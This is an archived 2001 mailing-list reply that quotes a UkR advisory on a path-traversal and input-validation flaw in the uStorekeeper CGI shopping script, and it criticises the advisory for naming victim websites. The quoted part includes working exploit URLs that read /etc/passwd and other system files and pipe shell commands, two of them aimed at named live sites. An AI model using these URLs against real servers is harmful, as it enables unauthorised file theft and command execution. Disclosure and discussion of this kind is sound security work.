OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: admincgisecurity.com
Date: Wed Apr 04 2001 - 12:35:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    > ---=== UkR security team - Advisory ===---
    > uStorekeeper(tm) Online Shopping System - Runtime Script
    > - 'arbitrary file retreival' vulnerability
    > Date: 03.04.2001
    > Problem: input validation error.
    > Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
    > Product vendor: Microburst Technologies / http://www.uburst.com
    > Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd).

    The following advisory was actually found in december of 2000 by the staff
    at cgisecurity.com. No bugtraq posted was published on the otherhand because
    after speaking with the vendor they informed us that not every version
    was effected and they the newer versions of this product have been patched.
    A staff member of cgisecurity.com did make a proof of exploit for this code
    but we did give little details of the vendor due to them asking us not
    to.

    Every so often when finding a new bug it will get posted publically before
    you can even finish looking into its full details. This has been the case for
    about 5 advisories and we have scraped them due to this. It is noted that UkR
    probably had no idea that this was a published known problem and that
    researching a exploit before releasing it is usually a good idea.
    (Try going to google and searching for it. You will find our semi
    advisory release pops up in this search) WE decided not to publish our
    exploit onto bugtraq because we are not about lives of kiddots easier
    but if you would like to check it out following the link from our main site.

    > Workaround:
    > Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
    > Greets
    > Exploit:
    > http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
    > http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
    > Example:
    > http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
    > http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|

    Now is mentioning the victem websites really needed?
    Finding a hole is one thing but providing a url to click onto
    to exploit it is just stupid. Hopefully non of these admins
    find out and decide to sue you .
    (Everybody else keep checking attrition and see if this is the case)

    - zenomorph